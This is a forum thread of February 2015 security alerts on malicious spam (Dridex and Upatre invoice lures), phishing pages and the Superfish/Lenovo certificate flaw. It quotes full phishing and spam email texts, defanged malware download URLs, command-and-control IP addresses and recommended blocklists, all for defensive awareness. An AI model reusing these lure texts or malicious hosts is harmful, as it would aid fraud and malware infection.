Submit time: Tue, 17 Feb 2015 11:11:55 +0000
Malicious File Name and MD5:
invoice.exe (6E3EF30E49B69E8AA6F487816A4AC9F9)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/57956026dff9ee9ed16b0be08a0089ed/tumblr_inline_njx66dQFbG1r6pupn.png
Tagged: FedEx, Upatre
___
Equation Group IP ranges and domains
- http://blog.dynamoo.com/2015/02/an-analysis-of-reported-equation-group.html
17 Feb 2915 - "There has been a lot of buzz this morning about "The Equation Group", a possible state actor involved in placing malware on hard disks..."
(Good read, but WAY too many IPs to be listed here - see the dynamoo URL above.)
- https://isc.sans.edu/diary.html?storyid=19345
2015-02-17
- http://www.theregister.co.uk/2015/02/17/kaspersky_labs_equation_group/
17 Feb 2015
:fear::fear: :mad:
AplusWebMaster
2015-02-18, 14:49
FYI...
Multiple SPAM emails using malicious XLS or XLSM attachment
- http://blog.dynamoo.com/2015/02/multiple-spam-emails-using-malicious.html
18 Feb 2015 - "I'm seeing multiple spam runs (probably pushing the Dridex banking trojan) with no-body-text, various subjects and either an XLS or XLSM attachment. Example subjects include:
Copy attaced
RE: Requests documentation [458C28133]
Request error [C3843]
Request error [FDF396530]
Requests documentation [242B035667]
Attachments look something similar to this:
15E376774.xlsm
242B035667.xlsm
458C28133.xls
C3843.xls
FDF396530.xlsm
The XLS and XLSM files are different structurally.. the XLSM files are basically an Office 2007 ZIP archive of all the data components, the XLS files are an old school Office 2003 file. Nevertheless, [i]they contain a macro with 23 components to make it harder to analyse, although the important modules are Module 11 which contains the text string to decrypt, and Module 14 which contains the decryption function itself. Almost everything else is irrelevant. Once the string is decrypted, it becomes fairly obvious what it going on. So far, there appear to be four strings with different download locations... we can see a file dxzq.jpg being downloaded which is actually a CAB file (JIOiodfhioIH.cab) which is then expanded to JIOiodfhioIH.exe and then run. For information, these IPs are hosted by:
5.196.243.7 (OVH, Ireland)
46.30.42.151 (Eurobtye LLC, Russia)
176.31.28.235 (OVH, France)
92.63.88.63 (MWTV, Latvia)
This executable has a detection rate of 4/56. Automated analysis... shows attempted network connections to:
82.151.131.129 (Doruknet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)
The Malwr report shows that it also drops a DLL with a detection rate of just 1/56*.
Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
5.196.243.7
46.30.42.151
176.31.28.235
92.63.88.63 ..."
* https://www.virustotal.com/en/file/2884d4315258fab8917731b996b7536470558f7f61e969be469e1f874e50d9d5/analysis/1424263599/
- http://myonlinesecurity.co.uk/excel-xlsm-malware/
18 Feb 2015 - "... The email has a totally-blank-body..."
> https://www.virustotal.com/en/file/3b1b023a27a27a500815da2dc15943ca679e6abfbe02bea050a94adb42e0609a/analysis/1424262074/
___
Fake 'Thank you' SPAM – PDF malware
- http://myonlinesecurity.co.uk/thank-you-for-your-payment-fake-pdf-malware/
18 Feb 2015 - "'Thank you for your payment' pretending to come from nycserv@ finance .nyc .gov with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Thank-you-for-your-payment.png
18 February 2015: attachment.zip : Extracts to: attachment.exe
Current Virus total detections: 9/57* ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ef74c90eaf5bad3b27c12991c05d858173e7c5971655cb2e3fb165738b311e69/analysis/1424277505/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
31.43.236.251: https://www.virustotal.com/en/ip-address/31.43.236.251/information/
50.87.148.213: https://www.virustotal.com/en/ip-address/50.87.148.213/information/
31.43.236.251: https://www.virustotal.com/en/ip-address/31.43.236.251/information/
UDP communications
77.72.174.161: https://www.virustotal.com/en/ip-address/77.72.174.161/information/
77.72.174.160: https://www.virustotal.com/en/ip-address/77.72.174.160/information/
___
Fake 'Esso E-bill' SPAM – doc malware
- http://blog.dynamoo.com/2015/02/malware-spam-uk-fuels-esso-e-bill.html
18 Feb 2015 - "This fake invoice is a -forgery- with a malicious attachment:
From: invoices@ ebillinvoice .com
Date: 18 February 2015 at 09:01
Subject: UK Fuels Esso E-bill
Customer No : 90714
Email address : [redacted]
Attached file name : 36890_06_2015.DOC (ZIP)
Dear Customer
Please find attached your invoice for Week 06 2015.
If you have any queries regarding your e-bill you can contact us at invoices@ ebillinvoice .com.
Alternatively you can log on to your account at www .velocitycardmanagement .com to review your transactions and manage your account online.
Yours sincerely
Customer Services
UK Fuels...
I have only seen a single sample of this, with a ZIP file 36890_06_2015.zip attached, which in turn contains a document 36890_06_2015.doc. This document contains a malicious macro, and is exactly the same as the one used in this campaign* leading to the Dridex banking trojan."
* http://blog.dynamoo.com/2015/02/this-fake-financial-spam-has-malicious.html
- http://myonlinesecurity.co.uk/uk-fuels-esso-e-bill-word-doc-malware/
18 Feb 2015
> https://www.virustotal.com/en/file/07649dcb0d2f4661f3b9fea0450cd0e103f5a4b186fca02e652f94b59a80be8f/analysis/1424251443/
___
Fake 'auto insurance' SPAM - doc malware
- http://blog.dynamoo.com/2015/02/this-fake-financial-spam-has-malicious.html
18 Feb 2015 - "This -fake- financial spam has a malicious attachment:
From: Dan Bigelow [dan@ express-insurance .net]
Date: 18 February 2015 at 09:18
Subject: Auto insurance apps and documents
Hello ,
Please print “All” attached forms and sign and initial where I highlighted.
Scan and email back to me or fax to me at 407-937-0511.
Sincerely,
Dan Bigelow
Referrals are important to us. If you know anyone who would benefit from our services, please contact me.
We would appreciate the opportunity to work with them.
2636 West State Rd 434 # 112
Longwood, Fl 32779 ...
This spam does -not- actually come from Express Insurance nor have their systems or data been compromised in any way. Instead this is a simple -forgery- with a malicious Word document attached. There are actually at least two different versions of the document with zero detections [1] [2]... Despite the difference, both seem to download from:
http ://ecv.bookingonline .it/js/bin.exe
The download file is saved as %TEMP%\FfdgF.exe and has a VirusTotal detection rate of 3/57*. Automated analysis tools... indicate that it attempts to phone home to:
83.169.4.178 (Hosteurope, Germany)
202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)
This probably drops a Dridex DLL, however the Malwr analysis appears to have malfunctioned and I don't have a sample.
Recommended blocklist:
83.169.4.178
202.44.54.5
66.110.179.66 "
1] https://www.virustotal.com/en/file/7c1c37569f1e6a7128c832cb54fb5505b431a2f70101ebd68673a9a2ac73903a/analysis/1424256101/
2] https://www.virustotal.com/en/file/07649dcb0d2f4661f3b9fea0450cd0e103f5a4b186fca02e652f94b59a80be8f/analysis/1424256116/
* https://www.virustotal.com/en/file/1a384a6b4fcb3c0ec4639ec5db6632cb7118809ebe52554db6f005993f582211/analysis/1424257699/
:fear: :mad:
AplusWebMaster
2015-02-19, 13:32
FYI...
Fake 'Statement' SPAM – XLS malware
- http://myonlinesecurity.co.uk/maria-wilson-securigroup-statement-excel-xls-malware/
19 Feb 2015 - "'Maria Wilson Securigroup Statement' pretending to come from Maria Wilson <maria.wilson132@ securigroup .co .uk> (the email address that pretends to send changes with each email so you get maria.wilson<random numbers>@securigroup .co .uk) with a malicious xls attachment is another one from the current bot runs... So far today -3- different versions of the malware attachment have been seen...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Maria-Wilson-Statement.png
19 February 2015 : Statement 18 FEB 2015.xls
Current Virus total detections: 0/57* | 0/57** | 0/57*** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/86a12763d3cf208e30082aa4cac2a143d785d74a35f2ca7aa6d1c68c5bde33f1/analysis/1424337205/
** https://www.virustotal.com/en/file/d6174a638343b830676933d46ea031e5a52d271f36dc327c13503f251adf933c/analysis/1424337493/
*** https://www.virustotal.com/en/file/ebeada62160766732aeb70aa7dd5507c595b41bc93b40fb87059747c409e8eb0/analysis/1424337433/
- http://blog.dynamoo.com/2015/02/malware-spam-maria-wilson.html
19 Feb 2015
"... Recommended blocklist:
83.169.4.178
66.110.179.66
202.44.54.5
14.99.146.242
78.140.164.160
220.143.5.92
217.12.203.34 "
___
Fake 'Invoice' SPAM – XLS malware
- http://myonlinesecurity.co.uk/marylou-proforma-invoice-excel-xls-malware/
19 Feb 2015 - "'Marylou Proforma Invoice' pretending to come from Marylou Champagne <marylou@ droitcour .com> with a malicious Excel XLS attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/marylou-Proforma-Invoice.png
The malware payload is exactly the same as today’s Maria Wilson Securigroup Statement – Excel XLS malware* although -named- differently Inv SP14216.xls "
* http://myonlinesecurity.co.uk/maria-wilson-securigroup-statement-excel-xls-malware/
___
Fake 'Remittance Advice' SPAM - XLS malware
- http://myonlinesecurity.co.uk/this-is-your-remittance-advice-cci36306-excel-xls-malware/
19 Feb 2015 - "Following on from -other- Excel XLS macro laden malwares today we are seeing a load of -damaged/misconfigured- emails with a malicious Excel XLS attachment arriving. The subject says 'This is your Remittance Advice #CCI36306' and pretends to come from Violet Garner <Jodi.1d@ ip-35-29-71-77. bgwan .com> The email has -garbled- plain text content with 3 attachments. They are supposed to be a rerun of 'SGBD National Payments Centre – This is your Remittance Advice' – Excel XLS malware* ... the 3rd is the malware attachment, which is named CCI36306.xls and contains exactly the same malware payload as the other malixcious XLS files from today 'Marylou Proforma Invoice'** – Excel XLS malware and "Maria Wilson Securigroup Statement'*** – Excel XLS malware... All these emails have random invoice numbers in the subject line and the invoice number matches the attachment name & number in most cases so far today...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/This-is-your-Remittance-Advice-CCI36306.png
... Some mail clients and mail servers ( particularly web based email services) might deliver these emails intact and readable. My mail server is very precise and doesn’t try to fix broken/misconfigured emails and either rejects/quarantines them or delivers them as is and leaves it up to the receiving email client to make heads or tails of them. These all are from the current bot runs... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/sgbd-national-payments-centre-remittance-advice-excel-xls-malware/
** http://myonlinesecurity.co.uk/marylou-proforma-invoice-excel-xls-malware/
*** http://myonlinesecurity.co.uk/maria-wilson-securigroup-statement-excel-xls-malware/
___
Fake 'order shipment' SPAM - XLS malware
- http://myonlinesecurity.co.uk/your-order-is-ready-for-shipment-tnhp3638_572-excel-xls-malware/
19 Feb 2015 - "'Your order is ready for shipment T/N:HP3638_572' pretending to come from Christian Stout, State Department <834b3a@ aluguelubatuba .com> with a malicious Excel XLS attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Christian-Stout.png
19 February 2015 : HP3638_572.xls - Current Virus total detections: 2/57*
... which downloads from 185.48.56.137 /ssdynamooss/sspidarss.cab and creates %temp\fgdgfffgfgf.exe
(-dridex- banking Trojan) which has a virus total detection rate 5/57** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4ad7ed1ab9734ce40601e2283c3f1bb00607770c517901c322a33c41894ce720/analysis/1424346447/
** https://www.virustotal.com/en/file/93242b25aaf2aea8ecef7327cbfc40cb8f8fda0eecd4618674062f81186ed8b2/analysis/1424347235/
... Behavioural information
TCP connections
82.151.131.129: https://www.virustotal.com/en/ip-address/82.151.131.129/information/
- http://blog.dynamoo.com/2015/02/malware-spam-state-department-order.html
19 Feb 2015
"...Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
85.143.166.0/24
37.139.47.0/24 "
* https://www.virustotal.com/en/file/93242b25aaf2aea8ecef7327cbfc40cb8f8fda0eecd4618674062f81186ed8b2/analysis/1424356739/
** https://www.virustotal.com/en/file/e020506da135769e6adb51c29b3e0965193afae344d709fb1a31bc386f43b1f0/analysis/1424358171/
___
Macros? Really?!
- https://isc.sans.edu/diary.html?storyid=19349
2015-02-19 - "... While the past 15 years or so were mostly devoid of any significant macro viruses, macro-based malware is now making a "successful" comeback. Last week, we saw a significant Dridex malware run that was using macros in Excel files (.XLSM), and earlier this week, the crooks behind the banking spyware "Vawtraq" started to spam the usual "Fedex Package" and "Tax Refund" emails, but unlike in other malspam runs, the attachment was no longer a ZIP with an EXE or SCR inside, but rather a file in Microsoft Office .DOC format. File extension based blocking on the email gateway is not going to save your bacon on this one... For Vawtraq, -if- the recipient -opens- the DOC, the content looks garbled, and the only readable portion is in (apparently) user-convincing red font, asking the recipient to enable macros. You can guess what happens next if the user falls for it...: A VBS and Powershell file get extracted from the DOC, and then download and -run- the Vawtraq malware executable. The whole mess has very low detection in anti-virus, yesterday's Vawtraq started with zero hits on VirusTotal, and even today, one day later, it hasn't made it past 7/52 anti-virus engines detecting the threat yet. Thus, odds are you will need to revert to manual analysis to determine if a suspicious Office document is indeed malicious, and to extract any indicators from it that can help to discover users on your network who have been "had"..."
___
Fake 'DVLA' Phish...
- http://myonlinesecurity.co.uk/dvla-you-are-eligible-to-receive-a-tax-disc-refund-phishing/
19 Feb 2015 "'You are eligible to receive a tax disc refund' pretending to come from DVLA <refund @directdvla .co .uk> is a brand new -phish- attempt to steal your Personal information, driving licence details and your Bank details. I have never previously seen one of these and definitely have never seen any phishing attempt that asks you to scan/photograph your driving licence and upload a copy of that. This one wants your personal details, A copy of your driving licence to be uploaded and bank details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/dvla_tax_refund_email.png
If you follow-the-link (don't) you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/dvla_tax_refund_1.png
After you upload a copy of your driving licence you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the name and date of birth is filled in:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/dvla_tax_refund_2.png
You are then sent on to the genuine DVLA pages..."
___
Apple GSX Access – Phish...
- http://myonlinesecurity.co.uk/apple-gsx-access-privileges-phishing/
19 Feb 2015 - "'Apple GSX Access Privileges' pretending to come from gsx_notifications@ apple .com is one of the latest phish attempts to steal your Apple account. This one only wants your Apple log in details Many of them are also designed to specifically steal your credit card and bank details, your email, facebook and other social network log in details as well... Some versions of this phish will ask you fill in the html (webpage) form that comes -attached- to the email.
Dear GSX User,
Your access privileges on the Apple Global Service Exchange (GSX) system were revoked by GSX_Rejections@ group .apple .com on 19-Feb-2015
Reason for Revoking access :
http ://idmsa-gsx-apple .net/WebApp-login.html
Please contact your GSX administrator for more information.
If you follow the link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/GSX-Access-Privileges-1024x588.png
When (IF) you fill in your user name and password you get sent immediately to an identical page to log in again, but this time it is the genuine Apple GSX log in page..."
___
Some Superfish domains and IP addresses and ranges...
- http://blog.dynamoo.com/2015/02/some-superfish-domains-and-ip-addresse.html
19 Feb 2015 - "In the light of the growing Lenovo/Superfish* fuss, I set out to identify those Superfish domains and IPs that I could, for the purposes of -blocking- or monitoring. The domains and IPs that I have been able to identify are here [csv**]. Superfish appear to operate the following domains (and several subdomains thereof):
venn .me
best-deals-products .com
superfish .com
pin2buy .net
pintobuy .net
similarproducts .net
adowynel .com
govenn .com
group-albums .com
jewelryviewer .com
likethatapps .com
likethatdecor .com
likethatpet .com
likethatpets .com
testsdomain .info
superfish .mobi
vennit .net
superfish .us
These following IP addresses and ranges appear to be used exclusively by Superfish (some of their other domains are on shared infrastructure).
66.70.35.240/28
66.70.34.64/26
66.70.34.128/26
66.70.34.251
66.70.35.12
66.70.35.48
All of those IPs are allocated to Datapipe in the US. Superfish itself is based in Israel, which seems to be a popular place to develop adware..."
* http://thenextweb.com/insider/2015/02/19/lenovo-caught-installing-adware-new-computers/
** http://www.dynamoo.com/files/superfish.csv
>> http://www.reuters.com/article/2015/02/19/us-lenovo-cybersecurity-idUSKBN0LN0XI20150219
Feb 19, 2015
:fear::fear: :mad:
AplusWebMaster
2015-02-20, 16:28
FYI...
Fake 'Bank' SPAM - PDF malware
- http://myonlinesecurity.co.uk/lloyds-bank-pendeford-securities-please-read-action-requiredpi-documents-region-code-east-2-9147056-fake-pdf-malware/
20 Feb 2015 - "'Lloyds Bank – Pendeford Securities – Please Read Action Required/PI Documents/ Region code East 2/ 9147056/' pretending to come from RSTNAME} Woodruff <Arron.Woodruff@ lloydsbanking .com> with a zip attachment is another one from the current bot runs... The email looks like:
Please find attached our document pack for the above customer. Once completed please return via email to the below address.
If you have any queries relating to the above feel free to contact us at MN2Lloydsbanking@ lloydsbanking .com
Lloyds Banking Group plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC95000. Telephone: 0131 225 4555. Lloyds Bank plc. Registered Office: 25 Gresham Street, London EC2V 7HN. Registered in England and Wales no. 2065. Telephone 0207626 1500. Bank of Scotland plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC327000. Telephone: 08457 21 31 41. Cheltenham & Gloucester plc. Registered Office: Barnett Way, Gloucester GL4 3RL. Registered in England and Wales 0128078. Telephone: 0845 603 1637
Lloyds Bank plc, Bank of Scotland plc are authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and Prudential Regulation Authority.
Cheltenham & Gloucester plc is authorised and regulated by the Financial Conduct Authority.
Halifax is a division of Bank of Scotland plc. Cheltenham & Gloucester Savings is a division of Lloyds Bank plc.
HBOS plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC272200.
This e-mail (including any attachments) is private and confidential and may contain privileged material. If you have received this e-mail in error, please notify the sender and delete it (including any attachments) immediately. You must not copy, distribute, disclose or use any of the information in it or any attachments. Telephone calls may be monitored or recorded...
The malware attached to this email is the same malware as in today’s other Upatre "delivery supply only quotation 16822 in total"* – fake PDF malware . If previous days are anything to go by, we -will- see -numerous- different emails all containing the same upatre malware and all with different file names..."
* http://myonlinesecurity.co.uk/supply-only-quotation-16822-in-total-fake-pdf-malware/
20 Feb 2015 - "'supply only quotation 16822 in total' pretending to come from wendy@ burwoodsupply .co .uk with a zip attachment is another one from the current bot runs... The email looks like:
Hi
Attached are 1 quotes so far they are in excel format so they can be altered if necessary (I normally only send the quotes in PDF so they can’t be altered but Mike asked me not to do this).
The rest to follow tomorrow a.m.
Regards
Teresa Byron
Office Administrator
ECY Armco Barley Castle Lane, Appleton Thorn, Warrington, Cheshire, WA4 4RB t: +44(0)1925 860000 f: +44(0)1925 861111
This email is confidential. It may also be privileged or otherwise protected by work product immunity or other legal rules. If you are not the intended recipient please notify the sender. Please delete the message from all places in your computer where it is stored...
20 February 2015: quotes.zip: Extracts to: quotes.exe
Current Virus total detections: 2/57** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
** https://www.virustotal.com/en/file/d271d5563c8a2ab4dac1eeaef22d1ea510148983231d907e08241d58b1c1a5ea/analysis/1424432388/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
31.43.236.251: https://www.virustotal.com/en/ip-address/31.43.236.251/information/
81.169.145.150: https://www.virustotal.com/en/ip-address/81.169.145.150/information/
31.43.236.251: https://www.virustotal.com/en/ip-address/31.43.236.251/information/
___
Fake 'NYC Parking Fine' SPAM - malware
- http://www.hoax-slayer.com/new-york-parking-fines-malware.shtml
Feb 20, 2015 - "Email purporting to be from the NYC Department of Finance thanks you for paying $7900 in parking fines via your credit card and suggests you open an -attached- file to view details... claims to be from the NYC Department of Finance... Opening the attached .zip file will reveal a malicious .exe file. If you then click-the-.exe file, -malware- may be installed on your computer. The exact type of malware varies..."
___
Lenovo - vulnerable to HTTPS Spoofing
- https://www.us-cert.gov/ncas/current-activity/2015/02/20/Lenovo-Computers-Vulnerable-HTTPS-Spoofing
Feb 20, 2015 - "Lenovo consumer personal computers employing the pre-installed Superfish Visual Discovery software contain a critical vulnerability through a compromised root CA certificate. Exploitation of this vulnerability could allow a remote attacker to read -all- encrypted web browser traffic (HTTPS), successfully impersonate (spoof) any website, or perform other attacks on the affected system. US-CERT recommends users and administrators review Vulnerability Note VU#529496* and US-CERT Alert TA15-051A** for additional information and mitigation details."
* http://www.kb.cert.org/vuls/id/529496
Feb 20, 2015 - "... Solution: The CERT/CC is currently unaware of any official solutions to this problem and recommends the following workarounds.
- Uninstall Komodia Redirector SDK and associated root CA certificates
- Uninstall any software that includes the Komodia Redirector and SSL Digestor libraries..."
** https://www.us-cert.gov/ncas/alerts/TA15-051A
Feb 20, 2015 - "... Solution: Uninstall Superfish VisualDiscovery and associated root CA certificate
- Uninstall any software that includes the Komodia Redirector and SSL Digestor libraries. In the case of Lenovo PCs, this includes Superfish Visual Discovery.
It is also necessary to remove affected root CA certificates. Simply uninstalling the software does not remove the certificate. Microsoft provides guidance on [3] deleting (link is external) and [4] managing (link is external) certificates in the Windows certificate store. In the case of Superfish Visual Discovery, the offending trusted root certification authority certificate is issued to “Superfish, Inc.”
Mozilla provides similar [5] guidance for their software, including the Firefox and Thunderbird certificate stores."
3] https://technet.microsoft.com/en-us/library/cc772354.aspx
4] http://windows.microsoft.com/en-us/windows-vista/view-or-manage-your-certificates
5] https://wiki.mozilla.org/CA:UserCertDB#Deleting_a_Root_Certificate
> http://support.lenovo.com/us/en/product_security/superfish_uninstall
- https://blog.malwarebytes.org/privacy-2/2015/02/lenovo-and-the-superfish-fiasco/
Feb 20, 2015 - "... To find out if you are affected, you can visit:
- https://filippo.io/Badfish/ "
:fear: :mad:
AplusWebMaster
2015-02-23, 17:39
FYI...
Fake Magazine Invoice SPAM - PDF malware
- http://myonlinesecurity.co.uk/essex-central-magazine-invoice-fake-pdf-malware/
23 Feb 2015 - "'Essex Central Magazine Invoice' pretending to come from Essex Central Magazine <darren@ notifications .kashflow .com> with a zip attachment is another one from the current bot runs... The email looks like:
Please see attached invoice for the upcoming issue of Essex Central
Magazine.
Regards,
Accounts Dept.
23 February 2015: invoice.zip: Extracts to: invoice_pdf.exe
Current Virus total detections: 4/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8762db3bdb7a7a1d69dd2e4e152340baeb0ec4d654698b52a38ab9d736242b79/analysis/1424701064/
- http://blog.mxlab.eu/2015/02/23/fake-email-from-essex-central-magazine-contains-upatre-trojan/
Feb 23, 2014
> https://www.virustotal.com/en/file/8762db3bdb7a7a1d69dd2e4e152340baeb0ec4d654698b52a38ab9d736242b79/analysis/
___
A Week in Security...
- https://blog.malwarebytes.org/online-security/2015/02/a-week-in-security-feb-15-21/
Feb 23, 2013 - "... fakeouts festooned all over YouTube, claiming to activate Windows 10:
> https://blog.malwarebytes.org/online-security/2015/02/windows-10-activation-programs-pups-and-surveys/
... rogue tweets on Twitter baiting whoever is interested in Evolve:
> https://blog.malwarebytes.org/fraud-scam/2015/02/evolve-gamers-hunted-by-malware/
... a quite rare phishing campaign that targets accounts of Japanese gamers who have profiles under Square Enix:
> https://blog.malwarebytes.org/fraud-scam/2015/02/square-enix-phishers-home-in-on-dragon-quest-x-video-gamers/
... an infection via malicious code injection on the official website of renowned British celebrity chef... the site launches exploits targeting vulnerabilities on Adobe Flash, Silverlight, and Java:
> https://blog.malwarebytes.org/exploits-2/2015/02/celebrity-chef-jamie-olivers-website-hacked-redirects-to-exploit-kit/
... a compromise on RedTube, a top adult entertainment site. It was injected with a rogue iframe that directs visitors to the download and execution of an Angler exploit kit variant. The said EK targets Flash and Silverlight vulnerabilities:
> https://blog.malwarebytes.org/exploits-2/2015/02/top-adult-site-redtube-compromised-redirects-to-malware/
... Malwarebytes Labs Team."
:fear: :mad:
AplusWebMaster
2015-02-24, 14:29
FYI...
Fake Invoice SPAM - doc malware
- http://blog.dynamoo.com/2015/02/malware-spam-berendsen-uk-ltd-invoice.html
24 Feb 2015 - "This -fake- invoice is not from Berendsen UK Ltd but is a simple forgery. They are not sending out the spam and their systems have not been compromised in any way. Instead, this email has a malicious Word document attached.
From: donotreply@ berendsen .co .uk
Date: 24 February 2015 at 08:09
Subject: Berendsen UK Ltd Invoice 60020918 117
Dear Sir/Madam,
Please find attached your invoice dated 21st February.
All queries should be directed to your branch that provides the service. This detail can be found on your invoice.
Thank you...
I have only seen one sample of this email, with a Word document IRN001549_60020918_I_01_01.doc which has a -zero- detection rate*. Contained within this is a malicious Word macro which downloads a component from the following location:
http ://heikehall .de/js/bin.exe
This binary has a VirusTotal detection rate of 2/57**. Automated analysis tools... show that it attempts to phone home to:
92.63.87.13 (MWTV, Latvia)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
78.140.164.160 (Webazilla, US)
31.160.233.212 (KPN, Netherlands)
185.14.30.98 (UA Servers, Ukraine)
86.104.134.156 (One Telecom, Moldova)
MWTV have featured several times on this blog. A close examination of their 92.63.80.0/20 block indicates a mix of legitimate and illegitimate sites, however the bad sites are concentrated in the following ranges:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
In addition to this, the malware attempts to drop a Dridex DLL which is widely detected by AV vendors with a detection rate of 30/57***.
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
5.196.241.196
66.110.179.66
202.44.54.5
78.140.164.160
31.160.233.212
185.14.30.98
86.104.134.156 "
* https://www.virustotal.com/en/file/10841585f9856262b8fa5fdeab9ff5ae3adab09a73af00c3fbc772bb96028275/analysis/1424770482/
** https://www.virustotal.com/en/file/5cf0ed4f294c6de3310316874fefac4a5aff9d67f1f08e9ab3cd1c9200bff21f/analysis/1424770511/
*** https://www.virustotal.com/en/file/ac8275e636cb5526768fc3abf027f6260fc7ce2c3b27b8d39ce3c092c6eccddc/analysis/1424772155/
- http://myonlinesecurity.co.uk/izabela-pachucka-arsenal-ltd-document-do-confirm-word-doc-malware/
24 Feb 2015 - "'Izabela Pachucka Arsenal LTD document do confirm' pretending to come from Izabela Pachucka <pachuckaizabela@ arsenalltd .pl>with a malicious word doc attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Izabela-Pachucka.png
The malware attached to this series of emails is exactly the same as in today’s Berendsen UK Ltd Invoice 60020918 117 – Word doc malware although renamed as roexport.doc* or roexport.xls..."
* http://myonlinesecurity.co.uk/berendsen-uk-ltd-invoice-60020918-117-word-doc-malware/
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/berendsen-1024x682.png
___
Fake Order SPAM - doc malware
- http://myonlinesecurity.co.uk/andrew-manville-icotherm-board-order-po15028-word-doc-malware/
24 Feb 2015 - "'Board Order – PO15028' pretending to come from Andrew Manville <andy@ icotherm .co .uk> with a malicious word doc attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Board-Order-PO15028.png
... exactly the -same- as the attachments to today’s other malicious word and excel macros Izabela Pachucka Arsenal LTD document do confirm – Word doc malware* and Berendsen UK Ltd Invoice 60020918 117 – Word doc malware** although re-named as SCAN_20150224_100752437.doc or SCAN_20150224_100752437.xls ..."
* http://myonlinesecurity.co.uk/izabela-pachucka-arsenal-ltd-document-do-confirm-word-doc-malware/
** http://myonlinesecurity.co.uk/berendsen-uk-ltd-invoice-60020918-117-word-doc-malware/
___
Fake 'Time Sheet' SPAM – PDF malware
- http://myonlinesecurity.co.uk/bobby-time-sheet-fake-pdf-malware/
24 Feb 2015 - "'Time Sheet' pretending to come from hartsellb@ mtpleasantnc .us with a zip attachment is another one from the current bot runs... The email looks like:
Sorry again this time it has a attachment.
Thanks
Bobby
24 February 2015: 2-9-15 to 2-15-15.zip: Extracts to: 2-9-15 to 2-15-15.exe
Current Virus total detections: 8/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0e4d5381c96ace96691abe446187247c47165eb1c55cb43400d780dd2d4f00a2/analysis/1424785308/
... Behavioural information
TCP connections
216.146.39.70: https://www.virustotal.com/en/ip-address/216.146.39.70/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
199.116.77.164: https://www.virustotal.com/en/ip-address/199.116.77.164/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
- http://threattrack.tumblr.com/post/111956283543/time-sheet-spam
Feb 24, 2015
___
Fake 'EFT Notification' SPAM – PDF malware
- http://myonlinesecurity.co.uk/town-of-mt-pleasant-here-is-your-eft-notification-fake-pdf-malware/
24 Feb 2015 - "'TOWN OF MT PLEASANT, here is your EFT Notification' pretending to come from finance_ap@ cabarruscounty .us with a zip attachment is another one from the current bot runs... The email is very basic and terse and simply has this in the body :
live-842000_12-17-2014-PE-E.pdf
24 February 2015: live-842000_12-17-2014-PE-E.zip:
Extracts to: live-842000_12-17-2014-PE-E.exe
Current Virus total detections: 7/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/09b1a2ec386df70f97bbdffed694f82fcfc0d522e078bf63640ae75163ac6b27/analysis/1424793555/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
46.30.212.175: https://www.virustotal.com/en/ip-address/46.30.212.175/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
UDP communications
66.228.45.110: https://www.virustotal.com/en/ip-address/66.228.45.110/information/
___
Fake FedEx SPAM - trojan
